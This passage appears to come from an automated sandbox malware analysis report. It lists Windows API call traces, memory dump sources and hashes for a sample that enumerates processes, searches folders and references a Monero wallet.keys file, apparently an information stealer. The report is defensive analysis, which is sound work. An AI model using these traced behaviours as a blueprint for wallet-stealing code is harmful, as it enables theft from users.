                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                      • String ID:
                      • API String ID: 3729781310-0
                      • Opcode ID: 0337c35713641376a02f3bac65f31860b07bc84639c53be507861fc8cbd6f4d6
                      • Instruction ID: 79fd95b388afa495cd2e78ff5ae41d128cccec8e88c34280f04919dbc61bb40d
                      • Opcode Fuzzy Hash: 0337c35713641376a02f3bac65f31860b07bc84639c53be507861fc8cbd6f4d6
                      • Instruction Fuzzy Hash: D9315C71E0125CDFDB15DFE0CC49BEDB779EB44300F20855AE506AA1C4DB74AA89CB51
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003F05B7), ref: 003E86CA
                      • Process32First.KERNEL32(?,00000128), ref: 003E86DE
                      • Process32Next.KERNEL32(?,00000128), ref: 003E86F3
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                      • CloseHandle.KERNEL32(?), ref: 003E8761
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                      • String ID:
                      • API String ID: 1066202413-0
                      • Opcode ID: be5e5122a5fa865e1e86e6f670b846d3ac0e2c26ba453f866efe48e2437a1bb4
                      • Instruction ID: 3002a92e3b651fa584cd0c9a9e6462bb3060f7fdbf2607e04160a1a9d15469a9
                      • Opcode Fuzzy Hash: be5e5122a5fa865e1e86e6f670b846d3ac0e2c26ba453f866efe48e2437a1bb4
                      • Instruction Fuzzy Hash: 4C316B71901668ABCB26DF96CC81FEEB778EF45700F104299F10AA61E0DB306E45CFA1
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,003F0E00,00000000,?), ref: 003E79B0
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003E79B7
                      • GetLocalTime.KERNEL32(?,?,?,?,?,003F0E00,00000000,?), ref: 003E79C4
                      • wsprintfA.USER32 ref: 003E79F3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                      • String ID:
                      • API String ID: 377395780-0
                      • Opcode ID: fa9d3de65e70903c3bcee01fbbb5760237669007d272c92709917648d6cf0a0a
                      • Instruction ID: b68994cedd765314be5292fab41c950180fbe317c62d7f196354dec4272cdc39
                      • Opcode Fuzzy Hash: fa9d3de65e70903c3bcee01fbbb5760237669007d272c92709917648d6cf0a0a
                      • Instruction Fuzzy Hash: 221127B2904118ABCB14DFCADD45BFEB7F9FB4CB11F14821AF605A2280E2395940CBB1
                      APIs
                      • __getptd.LIBCMT ref: 003EC74E
                        • Part of subcall function 003EBF9F: __amsg_exit.LIBCMT ref: 003EBFAF
                      • __getptd.LIBCMT ref: 003EC765
                      • __amsg_exit.LIBCMT ref: 003EC773
                      • __updatetlocinfoEx_nolock.LIBCMT ref: 003EC797
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                      • String ID:
                      • API String ID: 300741435-0
                      • Opcode ID: 16d6c25a955dba097ec88fe52d2982078d4f877278221222ea18fabd7f4d4a5c
                      • Instruction ID: 52a99e88995cd7ef236fd23e4340d4c71f3da4ba8e5aa9e70b7b4e4c214e928f
                      • Opcode Fuzzy Hash: 16d6c25a955dba097ec88fe52d2982078d4f877278221222ea18fabd7f4d4a5c
                      • Instruction Fuzzy Hash: 3DF0F0329106B09FD723BBBA880279EB3A06F00720F214348F004AE2D2CB246842CE56
                      APIs
                        • Part of subcall function 003E8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003E8E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 003E4F7A
                      • lstrcat.KERNEL32(?,003F1070), ref: 003E4F97
                      • lstrcat.KERNEL32(?,01089060), ref: 003E4FAB
                      • lstrcat.KERNEL32(?,003F1074), ref: 003E4FBD
                        • Part of subcall function 003E4910: wsprintfA.USER32 ref: 003E492C
                        • Part of subcall function 003E4910: FindFirstFileA.KERNEL32(?,?), ref: 003E4943
                        • Part of subcall function 003E4910: StrCmpCA.SHLWAPI(?,003F0FDC), ref: 003E4971
                        • Part of subcall function 003E4910: StrCmpCA.SHLWAPI(?,003F0FE0), ref: 003E4987
                        • Part of subcall function 003E4910: FindNextFileA.KERNEL32(000000FF,?), ref: 003E4B7D
                        • Part of subcall function 003E4910: FindClose.KERNEL32(000000FF), ref: 003E4B92
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                      • String ID:
                      • API String ID: 2667927680-0
                      • Opcode ID: 2962c47080b59aecfce102d12fa64d6ff0c3b93575b950df51e72ac46c0267d0
                      • Instruction ID: 64faaa9bf12b62592f3161592bf7942bb0c842749416383234f8397f980c90d5
                      • Opcode Fuzzy Hash: 2962c47080b59aecfce102d12fa64d6ff0c3b93575b950df51e72ac46c0267d0
                      • Instruction Fuzzy Hash: 6221DA7BD00218A7C755FBF0EC46EED333EAB54300F008659B659961C2EE749AC98B92